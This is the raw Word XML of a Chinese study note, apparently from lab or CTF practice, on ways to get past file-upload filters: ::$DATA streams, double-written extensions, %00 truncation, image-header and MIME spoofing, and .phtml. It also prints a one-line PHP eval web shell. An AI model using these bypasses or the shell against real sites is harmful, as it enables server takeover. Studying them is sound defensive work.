          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$DATA数据流绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>抓包后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在文件php后缀加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"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::DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"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这时候后端程序会认为这是一个额外数据流，因此不会去审核他，而windows系统会自动处理掉额外数据流的后缀 使其变回php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二：特殊的绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>双写绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为防止空格绕过，点绕过，额外数据流绕过，大小写绕过等，采用代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$file_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>str_ireplace($deny_ext,"",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$file_name);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该代码的作用是，将文件后缀里不符合要求的后缀替换成“”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因此应对方法是双写绕过：抓包，将后缀的php改成pphphp这样被替换之后就又变成了php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码审计【白名单过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="1016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273040" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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第二行：白名单是jpg，png，gif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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第三行：strrpos是寻找位数，substr是寻找字串，该行的意思是取文件名点后面的名称</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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第五行：保存临时路径【文件上传是先把文件放在临时路径，再把文件放在真实路径【img_path中，因此我们先上传shell.jpg，然后抓包，修改报文中save_path的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体" w:cs="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>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2614295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>975360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1443990" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="15" name="直接连接符 15"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3757295" y="4663440"/>
                          <a:ext cx="144399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205.85pt;margin-top:76.8pt;height:0pt;width:113.7pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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aeRS52AAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQ&#10;SwECFAAUAAAACACHTuJAsqeqoPcBAADAAwAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0RvYy54&#10;bWxQSwUGAAAAAAYABgBZAQAAkAUAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#ED7D31 [3205]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET型00截断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%00是为了防止php后面继续出现路径导致系统错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体" w:cs="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="12065" b="9525"/>
            <wp:docPr id="14" name="图片 14" descr="174113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41131005"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="2543175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POST型00截断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在POST请求中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%00不会被自动解码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，需要在16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中进行修改00.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5276850" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="6350" b="952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5276850" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">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t>先上传一个.jpg文件，抓包，拼接…/upload/123.php 123pinfo.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后再hex找到，然后把空格的20改成00因为这是post型的</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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字节标识绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下代码：第一行代表用二进制打开文件，之后通过文件头字节判断是什么类型的图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4134485" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="571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4134485" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2677160" cy="1144270"/>
            <wp:effectExtent l="0" t="0" r="2540"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2677160" cy="1144270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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其他绕过方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将后缀改成Phtml也可以绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GIF98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//前缀模仿图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;script language='php'&gt;eval($_POST['cc123']);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//在做题过程中遇到了判断代码是否存在&lt;?因此使用script代码来包含绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需注意每次抓包最好修改为image/png来进行mime绕过，防止其有多层安全过滤</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BA8F65"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5EBA8F65"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="6C851A17"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6C851A17"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:highligh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hiOGM2NzUzYzAwZWFhODJjYjgzMWFjZTZkYTg4M2MifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="4f731d53-8f62-4007-91d5-74b88009df71"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="006874AA"/>
    <w:rsid w:val="018A0548"/>
    <w:rsid w:val="09544970"/>
    <w:rsid w:val="09A17C56"/>
    <w:rsid w:val="0A742757"/>
    <w:rsid w:val="0CDB5470"/>
    <w:rsid w:val="0CF956B3"/>
    <w:rsid w:val="0D7569EB"/>
    <w:rsid w:val="0DEE0F90"/>
    <w:rsid w:val="0E6D45AA"/>
    <w:rsid w:val="138B10C5"/>
    <w:rsid w:val="14EA0E9F"/>
    <w:rsid w:val="160C46A9"/>
    <w:rsid w:val="17465999"/>
    <w:rsid w:val="18FB3049"/>
    <w:rsid w:val="1B9C3BDB"/>
    <w:rsid w:val="1C704011"/>
    <w:rsid w:val="1D034FDD"/>
    <w:rsid w:val="1D646B79"/>
    <w:rsid w:val="1E25455A"/>
    <w:rsid w:val="211A411E"/>
    <w:rsid w:val="21AE0A4B"/>
    <w:rsid w:val="22EC751D"/>
    <w:rsid w:val="23957A8C"/>
    <w:rsid w:val="23FF0994"/>
    <w:rsid w:val="27536864"/>
    <w:rsid w:val="28A15125"/>
    <w:rsid w:val="298F1421"/>
    <w:rsid w:val="2B5621EB"/>
    <w:rsid w:val="32ED589C"/>
    <w:rsid w:val="345325DE"/>
    <w:rsid w:val="3461089C"/>
    <w:rsid w:val="347436ED"/>
    <w:rsid w:val="378E578C"/>
    <w:rsid w:val="379C3687"/>
    <w:rsid w:val="38D33C05"/>
    <w:rsid w:val="38F53409"/>
    <w:rsid w:val="3A2A0167"/>
    <w:rsid w:val="3B1A0A62"/>
    <w:rsid w:val="3B8E1C0A"/>
    <w:rsid w:val="3BB15227"/>
    <w:rsid w:val="3E4573F0"/>
    <w:rsid w:val="3EF02B96"/>
    <w:rsid w:val="3FC36380"/>
    <w:rsid w:val="3FE9555D"/>
    <w:rsid w:val="41586871"/>
    <w:rsid w:val="4182779E"/>
    <w:rsid w:val="41CA2266"/>
    <w:rsid w:val="42AE2B40"/>
    <w:rsid w:val="43D1290A"/>
    <w:rsid w:val="44AA03C7"/>
    <w:rsid w:val="44FF5255"/>
    <w:rsid w:val="4610235E"/>
    <w:rsid w:val="4715661C"/>
    <w:rsid w:val="47DF4A3D"/>
    <w:rsid w:val="4C411D3E"/>
    <w:rsid w:val="4DC41977"/>
    <w:rsid w:val="4F0E056F"/>
    <w:rsid w:val="4F3530AB"/>
    <w:rsid w:val="51A16E07"/>
    <w:rsid w:val="51D21809"/>
    <w:rsid w:val="522233B1"/>
    <w:rsid w:val="533B1B4E"/>
    <w:rsid w:val="54817A35"/>
    <w:rsid w:val="56535711"/>
    <w:rsid w:val="565E52DC"/>
    <w:rsid w:val="57EE53E1"/>
    <w:rsid w:val="59B80EF5"/>
    <w:rsid w:val="5A466A93"/>
    <w:rsid w:val="5D777C27"/>
    <w:rsid w:val="5E556555"/>
    <w:rsid w:val="5E591EC7"/>
    <w:rsid w:val="5FF36852"/>
    <w:rsid w:val="60B81AEF"/>
    <w:rsid w:val="60E03D35"/>
    <w:rsid w:val="6115578D"/>
    <w:rsid w:val="611625CA"/>
    <w:rsid w:val="62500A46"/>
    <w:rsid w:val="625247BE"/>
    <w:rsid w:val="639F0612"/>
    <w:rsid w:val="64FC25B2"/>
    <w:rsid w:val="6575594A"/>
    <w:rsid w:val="65837637"/>
    <w:rsid w:val="679F3275"/>
    <w:rsid w:val="68147536"/>
    <w:rsid w:val="69784229"/>
    <w:rsid w:val="6C4866DC"/>
    <w:rsid w:val="6C8163CC"/>
    <w:rsid w:val="6CC31E27"/>
    <w:rsid w:val="6E6B2E90"/>
    <w:rsid w:val="70001CFE"/>
    <w:rsid w:val="711D41EA"/>
    <w:rsid w:val="71F00B3B"/>
    <w:rsid w:val="725E2571"/>
    <w:rsid w:val="72E90827"/>
    <w:rsid w:val="76DE441B"/>
    <w:rsid w:val="77F71C38"/>
    <w:rsid w:val="7D0E01F1"/>
    <w:rsid w:val="7E9975A5"/>
    <w:rsid w:val="7ED714BE"/>
